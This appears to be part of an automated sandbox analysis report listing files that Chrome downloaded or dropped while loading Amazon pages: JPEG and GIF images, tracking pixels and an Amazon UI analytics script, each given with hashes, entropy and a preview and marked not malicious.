                                                                                                                                                                                                                                                                      SHA-512:CAA0780EC972BCD29B646CEDAAE834FF5C92B59B89E542D8CB04680E360E0524586B821AE3BAF361AF8F08F29E8B5CB62E3C7F0D756685231C2D92862128DA23
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:"https://m.media-amazon.com/images/I/31qszhAmmGL._SR240,220_.jpg"
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4.................................................................,............................3..z..%.C..........k.x..o..Q...H._7...0.......|..?.v.7 ...w?..Zs9.vl.&........9,.%..c6....(L719.%9..u.o.F`......s9O+.{..uv]w...g.....#....E..............Y..+......W|..N........>..W............8...=.?M.g]+..Y^..,...:.}@......r...{.6...s..U...{...0...4.........q\....)..FE.C.x<.G.:`.@........2i..1..l...+D7"K.Q.T.C.mD&.............................,..........................@.!"13. #02A.BpC............#.`..7.a.Q....m0?.&c..v....oJ.U.@.0...|uCZ..X..l...Z..cT!......3g-.o5...%^]..........X......c..*..k..LZZ.{Q.q.N.By"..%9....K........$. `..9n..{....:..0..A....v|..L-.....C#,.....!r.....x.>..L.T...."_........K0..8L..:m(<.]W..ZU....bg..g>$.>.|Gy..q .Xg.m...x...-....D;........F.N&K..'3|l[r.C..J".f..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):4095
                                                                                                                                                                                                                                                                      Entropy (8bit):7.743327463635847
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:tUZqdvEba+kHCIjOTNa09i6Gw5q4fZI0fQqfD/KggfLbg3:aZqdvSarHCI2Na8X5q4hhb/wfLO
                                                                                                                                                                                                                                                                      MD5:9DD28A07312AC0BE48AF4F1819E9DDF0
                                                                                                                                                                                                                                                                      SHA1:FEE2552A4D89C7138F0F1995012F6C32B2FFF5C5
                                                                                                                                                                                                                                                                      SHA-256:F7D82D684B552273A06E2FB456D05F0ADC4A7873E3AF2EA07D930223280ADAB0
                                                                                                                                                                                                                                                                      SHA-512:618B09AB91B216E6128E15AE95268816F8BFC5ED7D2DD253C976A91476926D1767A3BA82FEF635ADF79FFDBEF2FD4C0EA95826FEBFBC8DD30197345F964D9E79
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF......................................................................................................................................................t...."..........:.......................................................................................1...z....l.6..h%8.Tv.L...lL..e..r=.J......<C.<)X...X.{."7..=..E..............E....a.D..E...L}..D...q.u........;1V.G.....-L/.8o...?...R..jF.v.............mhkt...A.6.b...^."]".........J......q........i.Y~...ZL.K@....j{Uo..D.........#..@..............H........................4...$.3@..#%ST.....!"5CDQUt...&APdesu 1Ec.............?....H...+..g...s.#.,E..\..3.w...N..4.'.T...%8.D..iu..7..`l>.\.1...-|.'.L..L...NG....|,S....N.Jl..9...X.uK.J....b..('.Xy....~.%...$....1 ..)P..!,[..'.......[l..\.*~aAwc>Zs...._.n...7..=...f.O...ng...3.F.^W..n..|...<R.?....Kl..`.......nI..........Gr=...+|.S.N.U.c.....j...x..t..D.{.~.k...<.......'x.....E..P...... ....{.]8...n@I%j......< ....BI...(S.G..E._q..m.?/QS...n.W
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 171x200, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):10730
                                                                                                                                                                                                                                                                      Entropy (8bit):7.964401775377065
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:sV223I796Byy2EHzyz+ItTZ+sLAVHB0f9JpkCkq7o4WkrFK:4/+96QvEH2z+ItTZXAUjp3Wig
                                                                                                                                                                                                                                                                      MD5:1EA1690584878CDD99D98AFF3D0859DF
                                                                                                                                                                                                                                                                      SHA1:21787BF695B7BE256C633A099DD93CF97CEA2AF8
                                                                                                                                                                                                                                                                      SHA-256:F9E1F86020FA2EEAFAB6DB74F0CD9EE7592E48BEED26227E55DC0495A6C0584F
                                                                                                                                                                                                                                                                      SHA-512:CABA91BFE451258F0BFFD54EF815CB65ABCCFA980D1B20BD60A95E5DC48EF11E51BDC2EE6B6B9366F9D731A80BDC24B347697A6D5E8B671114FA324E0F9EA323
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/6161ZPWqSFL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!..1AQ."2r.#6RTq........4Uast....$35BC....bc...%S.....................................................!1q...2AQR....."a..#3S.Br.............?...w.x...C .."^rJ..Ks.....Z].1.....@.'>n.L.A.P(.....sgx...q.1.E.|.+|l..8E..3'....Kz...$.t.....2L.jh...........,.u......n.t#......W3XdoeK.L.c/.r..j..Q.\K,..w........^.u.R..b8...c%.....c......JU.A.....g..1...^[~....Yc..R2..R.O.U..Ng..e..R...o.....T....,..)2....2..5.S......:..%s..H.N...m[PXy...E:qd8[.).......D....*y2..}...S.H..ns.".....N.....Q...%#T.GU..@..Q...R..V.............){).O...RT..g[T..O..,.........Y....%@.$.*.p.........b.9$...F...1.(B..).O...RR.S..7..w.t..<..^J.ul..h.~..B...(B#Yt..<.6^.dB..Rs..G.W..98.lW...e!.....+..^^...q7.[. ..6. .(....g.(i.|.]..;#.Y..sK..../....~6.]...}f.afh..pv.B...V.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):5108
                                                                                                                                                                                                                                                                      Entropy (8bit):7.812518197830165
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:T6pFGZ08ME1HgnGj9dQUsMFRsu4ZZwWTil5Uw5AvOJj:+pFWtH8GjoEKu4ZZjelWqpJj
                                                                                                                                                                                                                                                                      MD5:AABD13CF4A47AA47291FA104893F323B
                                                                                                                                                                                                                                                                      SHA1:02B48A7386A3C2E71B4BF4399CCEAC39CF467815
                                                                                                                                                                                                                                                                      SHA-256:9A782BEC98BB695B7CDA4BE0F8859EE19C4EAFBE1A46C87931AFA4B179E96AC6
                                                                                                                                                                                                                                                                      SHA-512:845E0219B2B6CFD5AC49E6E5FCF52DB8FDCDDE307778AFF2FD65D9C8CD3FFE228A89979B98327E1FA76BFB75A6545D731B5153A794B36B5CCC6C3C431A1956C7
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:"https://m.media-amazon.com/images/I/31R49MniA9L._SR240,220_.jpg"
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5..............................................................................................xl?9.V....M..]m.............%...r.:.O..3..`.brX_r......[.dv.;...............?.d.}.\.H...{....U..3...V#....;.>..Z..m_...............W....-..rx....3L]...(.H..p..m...j.....e.Og.7/.......j.X.....9 ...LG]V.....6...}.\.{.)...m...Uu...VX.c.,(......<.?7;g.=.(...R...S.....G...h.Q;..m...:.+../..S...SQ.6..^a..f...e..k..j.s......C.b.%.>....:/r..p....r._Z...P..?o.,.^}....\..;..\.2.2.....~m.vGhtyXN.-.....c..... n%<,.\..>.xGrObs.......7...}..!/.u......Wml.O =x..........Y._..l....5..~.)............+........,.F.....j\?..T............................................................. !01."23@AQBp#Ra............&...U:..hc.#......|.gWK.......I|.].........kw.tN.9..$....Jmn._.'..k./k|.......7.&...4.d..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):4046
                                                                                                                                                                                                                                                                      Entropy (8bit):7.876843791880682
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:aHs1GuI5RN41xFqdXUiymGr1DNY9EuuI7YoMLwixfpfsZ:EzqFqdL+bYuPAYLwupfM
                                                                                                                                                                                                                                                                      MD5:AC8163C28E70F8413809930878B747DF
                                                                                                                                                                                                                                                                      SHA1:BF117014E148980C423AC7847836DCF892DD499F
                                                                                                                                                                                                                                                                      SHA-256:C05C26B2EF0531A7C615F0306A3F42496CAEBD4C45609BCAA7FAE8CD7EFD70B7
                                                                                                                                                                                                                                                                      SHA-512:9D30B52900D14AF909BCE39808A35A0BFA922A7208CB538A18EA761892CC1D70FF1A43E65A74B83152C80FDE935CFCD76291F3105CEE8073153F25BE75233C87
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/OHL/BTS/QC/Updated/2407GH048_AE_OHL_DQC_Pricepoint_Officefurniture_EN_1x._SY116_CB567104843_.jpg
                                                                                                                                                                                                                                                                      Preview:........................................................#"""#''''''''''..................................................!! !!''''''''''..........Adobe.d...........t....".......................................................................................!.1."A.2Qq..a#3BUs....$DR....%456bct..............................!1.A.."Qa.23BTq.....4#rs..............?..Q.l.H""...." ...""...." ...""...." ?..Q.l.H"".....|Y.\..-..u}....>-.z;wl#8.U..?......^.CM$..@.z.=......,...X......&u.um&...Z.`..M.x..I.s7y.C..Z..W..B....g.t.....es..../p8....7.u....:CZ..%.. 3..;.p.-.........OT.....,<.%.R. ....r..%....).W*..Yr.L.+..#....7c|...#....z.|.......hg.s.uH.O. 9.o.o1h..*..mh.G......2V]|.5.NW....t..../....sS<....ah.T.sM^.......mC....H.#..Q3.0.{KenF.p.*.........UV...h%...{.Z=.p2.....y...[m.ONj(X$.....#..>...J.f...[..>W..._..l..`....d|..M^.....5(......g....C.l..-U.................#MU.AMN..V..c1....).....8.\...o....z..n........8....v....V.|.|..I..T......m.-...0{,...Zj.'B.#
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUnl/7yltxlHh/:/+/
                                                                                                                                                                                                                                                                      MD5:07FFF40B5DD495ACA2AC4E1C3FBC60AA
                                                                                                                                                                                                                                                                      SHA1:E8AC224BA9EE97E87670ED6F3A2F0128B7AF9FE4
                                                                                                                                                                                                                                                                      SHA-256:A065920DF8CC4016D67C3A464BE90099C9D28FFE7C9E6EE3A18F257EFC58CBD7
                                                                                                                                                                                                                                                                      SHA-512:49B8DAF1F5BA868BC8C6B224C787A75025CA36513EF8633D1D8F34E48EE0B578F466FCC104A7BED553404DDC5F9FAFF3FEF5F894B31CD57F32245E550FAD656A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://aax-eu.amazon-adsystem.com/e/loi/imp?b=JHu0Cp_6xtUcAjkkSpr-8WAAAAGRdjLkOQMAAAH2AQBvbm9fdHhuX2JpZDMgICBvbm9fdHhuX2ltcDEgICCMSks0
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1500x234, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):33466
                                                                                                                                                                                                                                                                      Entropy (8bit):7.978468550605761
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:zGZCrp/tf8peA4HdUv8zQRJNZNifCkk3IADyJ/VIWq:zGQp/tf8p39v8y5NiftSI9xq
                                                                                                                                                                                                                                                                      MD5:9B43798BAB6ED503829751E631B03FA7
                                                                                                                                                                                                                                                                      SHA1:6F5BE9F02C314A4944D6B1345621DEA093F3F8BF
                                                                                                                                                                                                                                                                      SHA-256:6BE1A607EBCDED0281B7FBA6124E3A8F987048C55DAEE3C82EFD6408573F0345
                                                                                                                                                                                                                                                                      SHA-512:ABA0D49B09D768315897BD729F59B07695246DF59B81C6D316FB9B9263ECE235285D5715E2F4643487F1535104BD680DF3CE3DDA298E1251A41DD707025CA4C0
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF.............C............................................!!$$!!0///06666666666...C............................."......". ... .%%""%%//,//6666666666..........."........................................M.........................!.1AQ."aq...2BR...#34r....CSbs...$5Tc..D..%&U..'7.......................................................!..1AQ.aq"...2R..B................?...Kr...X..Q.$.E...E.[..@\.@)nQr......@].E..5F..r...\.J..P........F.n.P&........O.x.......W.l......}..].2./....9..M...5C.-....[..,.........u..g6>...l.K.-..!....u..n.J.uK.D.T..E...P9..J.uJ..T..T.D(J.*......#..v....?.S./.I.;....*...w.+.ld......`......sk].u........G.=..m...#.S...#...T..2..hUf.@?N1.XN...Z.`j:)*"w..OC..&d..2..)C.$...@..F.....T4.s.V..&..$$..J.A.s.)AN.......Kt..H.;Q......$....G......i.[<$..i=..S.y7Au.........A|m.A.6I.DM..OxCR[.\%.M9 [.\#A..r@...Cy.n.%..1........n.s.m...o..&..;.7.B...A.....m..`H4...|..Y.....!..!.F....{.5W..Po.[m'.L........{....!..!..!...g.'.......5.T..o.R.....>.r...m%H.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 159x200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):8643
                                                                                                                                                                                                                                                                      Entropy (8bit):7.954847591742441
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:lUA659Oi82/JAla6j7UI1hDmfDcxaJwuxeby:F65s1G6v1hDmLcxaSWeG
                                                                                                                                                                                                                                                                      MD5:F1F287CD7009F99CD5D29933E72FC8FF
                                                                                                                                                                                                                                                                      SHA1:88CAADD7E408D88BB515D2FCA9AB198295D17FAD
                                                                                                                                                                                                                                                                      SHA-256:BD8FDAC2A800C4F74DAF25B03C77CF113E1F6D17573139E4DD7A6F01E368840B
                                                                                                                                                                                                                                                                      SHA-512:02CB4F388330C27D1C48D9AAFDCA8D1AE1A3155A464DE3AE43CE3089CC9E4372C099F0D0E85A235A74BC32FFC17D9FD8D4821DC311F75BBE8FFA5C2C9D2F1FDF
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!..1."AQ2aq...#TU..6Bt.........%RSbdr....Ee..&'4CDcsu.....................................................1Q!..."2Aq..a..#B............?......K.=$2.VNXV.ap...~..*...p..Q.G.....o......w.q,.-....J.M...Y....!..6..IEtb.6.vM...T.......W+a.o.5...\.....c.6".?..aY.e.."..btG3B.Aux..nG.+ *H...f1.....#.[...".{p.>..6................./.$..Q............s..SJ..}.r..g".......k.7L....m.{S....<....z.^..i..[.~......L.)*.f.VIDQ......-..B.........J.J:.!r.\..W-.'...u#p/..Dm.l.Y~yU....u..u>......y.]A...7...yr....z.}.F....]..#..O...x...uS.R~....zq;...]....U.h....,Z.~.^..o..j}.o..B1..w!.].Q.|.....\.....{....m.....=....~....yB.......T......<#.+..Hmc..<..3.Z..U.^.6......fi......y..9fj..8.t...:.)R.i ..q.a.*xI......scHT..yt..IS.Q.$.%(.HR.V...@w .*
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:APAVCQJMFK78QJEV1PMZ$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.295396.0%26id%3DAPAVCQJMFK78QJEV1PMZ%26ctb%3D1%26sc0%3Dadplacements%3AsfImpression%3Ab73e766d-3a78-4209-bde9-93efa566562d%26bb0%3D4772%26pc0%3D65845%26ld0%3D65815%26t0%3DWed%20Aug%2021%202024%2014%3A29%3A45%20GMT-0400%20(Eastern%20Daylight%20Time)%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DAPAVCQJMFK78QJEV1PMZ%26aftb%3D1%26lob%3D1:65845
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 87a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):35
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9302005337813077
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:M3UWRtJlllHh/:klJ/
                                                                                                                                                                                                                                                                      MD5:EFC4EC590572EDBD9502C40266EAF56B
                                                                                                                                                                                                                                                                      SHA1:F4E5AA15E838464E0BDE9D43805B5A5F36EEF6E9
                                                                                                                                                                                                                                                                      SHA-256:2BB20425D644D2D75889D1192CC182282F2ED2EFA9C7B98CD6E0D70761DE5907
                                                                                                                                                                                                                                                                      SHA-512:490A7E2D5F4EF201625FF9ED34D15F2D88FDFFDF6B7048701F3866ED1131997C7A3A80238A2FA19D919F64D6788087931D2EAC53A06741AE65CBA7BB4B0163C2
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-na.ssl-images-amazon.com/images/G/01/x-locale/common/grey-pixel.gif
                                                                                                                                                                                                                                                                      Preview:GIF87a.............,...........D..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 440x350, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):41545
                                                                                                                                                                                                                                                                      Entropy (8bit):7.973287047196714
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:3kkgA51OXYIk+UIafFPXzFAc4NguInuhmXgnXDkpn1PkOLtfVHSr2:3Fr0oIk+I9PXz6W7nMmXgnXDkpn1PkuV
                                                                                                                                                                                                                                                                      MD5:5E8C49CC487C896E10683C06E55DEA9A
                                                                                                                                                                                                                                                                      SHA1:97AB9DE18DAB7B1D8A01E106EDB9CC23536B92BF
                                                                                                                                                                                                                                                                      SHA-256:1A85B9317C61C15F11A1CA68F4B221C75905B975E2DAB9A011EAB1221EBD70E3
                                                                                                                                                                                                                                                                      SHA-512:5B229DFCB2A75880443A3CAEE6D0558F360131D1E89610400D0C053661BF148B441EFDDE36CD2447124E21E51379468CF90BF4C4E8A0B62A0AB5A4BA71BD3B23
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/home/store/furniture/Garden_outdoor/New_L2/XCM_Manual_1270036_BAU_AE_OHL_L2_NavTiles_Fertilizersseedspottingsoil_440x350_En_e40f8f22-8a11-429e-888b-1d985050da81.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF.............C............................................!!$$!!0///06666666666...C............................."......". ... .%%""%%//,//6666666666......^...."........................................O........................!1.A.."Qa2q....#BR...3.$b..CSr.....6st...%57c.&4d...................................6.....................!1..AQ.aq......"2..BR..3..#br..............?...o.z.\.....)..^ j1...@.Y..c5.9.12DN..-....k...VYU...I.R..........Ut..~.#mB...9o..`#.....+.).P|.R.P.....0s3F.X..W<.:...........5.J....&....<..$...O.ImW.;]...c"GuL.M..iX.<...VK-..%.=..C.]....:...5..da........!......MO.e..b....G...be...:..f....b.)^.D...ir$$.....M. ..R..^W.;.%..d(.6B..?...>c+4q.`.(...&..H..R....#f2...c.)au.c..%N.P6....?.....%.....]....A._..A.......L...s..].x..Q2...@4...D.N.a.......j@...'z8..0,:.y<.g.{6.Y|.".!&..*X..[....V.H..Uv.F...{o..$..y..Yg.FwL..W.Z=;...)....R.3..,E.e..cA...'...8.$......Pnd.?.:.A{..(..?|{.N../..@.......|..%_5..I.):..@1....{.......([;j7.....Y
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 50 x 50
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):14535
                                                                                                                                                                                                                                                                      Entropy (8bit):7.879436571334247
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:yJTbBqd41qycOfMACm+Ndq2f5zog1yPCsVasjCCML8OwKQ+:yJTbV17cO+84eNwsjCdLo+
                                                                                                                                                                                                                                                                      MD5:CB57C5063D4D6A58113CA014E0CD4A68
                                                                                                                                                                                                                                                                      SHA1:28057B6E3C95708FE4C43D83CC0EF15473E3A8A4
                                                                                                                                                                                                                                                                      SHA-256:A81C85E7996BC6D75C2535B24B65C9E667FA538A6E426BD8B0CC5AB833F1188F
                                                                                                                                                                                                                                                                      SHA-512:ABF7A687B5C7D47C0979BFADEC367F49E63F18BCB0032B264AF1249F2916D7FEFA837AAD5E7DA6FB1DA5AA9DC699DBDB311DA5785004A809002A3A8F1D1B013A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/S/sash/-NcRiM84u1IwoUa.gif
                                                                                                                                                                                                                                                                      Preview:GIF89a2.2..........]...........:....................................{............}..............u..........!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c001 79.14ecb42f2c, 2023/01/13-12:25:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:b5fda8ec-2814-4cb6-8f13-b3de686f05db" xmpMM:DocumentID="xmp.did:384E825BB64F11EDAC9EB44161D1C413" xmpMM:InstanceID="xmp.iid:384E825AB64F11EDAC9EB44161D1C413" xmp:CreatorTool="Adobe Photoshop 24.2 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:b5fda8ec-2814-4cb6-8f13-b3de686f05db" stRef:documentID="xmp.did:b5fda8ec-2814-4cb6-8f13-b3de686f05db"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (571)
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):369969
                                                                                                                                                                                                                                                                      Entropy (8bit):5.380624260002934
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3072:ZYCYcQZMuZ7q9P1+pKbayIAmk1Xaq/LTCz6PHaL5gYI5B6iSVMbN/vYSidNII:ZtYXUMKbaaP6LWY6bNXYSidNII
                                                                                                                                                                                                                                                                      MD5:E84CA3D67EBD8F4F8565277777769592
                                                                                                                                                                                                                                                                      SHA1:2E2F1CAA13EEB4D7B28C70CF8F1CEC1307773045
                                                                                                                                                                                                                                                                      SHA-256:5876F379D5EA8DFC1E5F810E5A76303CE84EC2C78A088D282975F13CD20F4129
                                                                                                                                                                                                                                                                      SHA-512:4E435E2D8E869BFC17C90DC26842E6F6904CE943DDFE43E60A486EA5467488AC6944B41CB93CA6F95E0CE739327DD055B00513549415732DA22963E95A90C4C3
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:(function(a){var c=window.AmazonUIPageJS||window.P,d=c._namespace||c.attributeErrors,b=d?d("AmazonUIBaseJS@analytics","AmazonUI"):c;b.guardFatal?b.guardFatal(a)(b,window):b.execute(function(){a(b,window)})})(function(a,c,d){"use strict";a.register("a-analytics",function(){function b(b,f){var a=c&&c.ue&&c.ue.count;if(a&&b){var e="aui:"+b;1<arguments.length&&a(e,f);return a(e)}}var a=c&&c.ue&&c.ue.tag;return{increment:function(a,f){if(a){var c=b(a)||0;b(a,c+(f||1))}},count:b,logError:function(a,f,b){c.ueLogError&&.c.ueLogError({message:a},{logLevel:f,attribution:b})},tag:function(b){a&&b&&a("aui:"+b)}}});a.when("a-analytics").register("prv:a-cache-analytics",function(a){function b(a){var b=a.name.indexOf("AUIClients/AmazonUI");a=a.name[b+19];a=a===d||"\x26"===a||"#"===a;return-1!==b&&a}function e(b){a.tag(("script"===b.initiatorType?"js":"link"===b.initiatorType?"css":"unknown")+":"+(b.transferSize===d||b.decodedBodySize===d?"unknown":0===b.transferSize&&0<b.decodedBodySize?"cache":0<b.t
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1381), with CRLF line terminators
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):2024
                                                                                                                                                                                                                                                                      Entropy (8bit):5.980749262792519
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:zRC7bRmot68Q8iAt/B73zFmkjSj87uItCp1:zRC5moADEt/B7bk87uIkT
                                                                                                                                                                                                                                                                      MD5:4B70F73116FA864A8D599BC6F75C1999
                                                                                                                                                                                                                                                                      SHA1:8A6E4E5F53604F71D072D64C9D2F434E2CE822A7
                                                                                                                                                                                                                                                                      SHA-256:BD4B8AAD887F13F26DC1F475E3D1FBE02719DC57D1750A05479A3F3C1BFBD204
                                                                                                                                                                                                                                                                      SHA-512:85ADC755475D516556DFF514A745247F4E8089B678B5255A1BE2B921875C9CD9280161904AE9429A80F674A48D6C2DEE6FBA4BC6F569ADE9FF481E647C4601C4
                                                                                                                                                                                                                                                                      Malicious:false
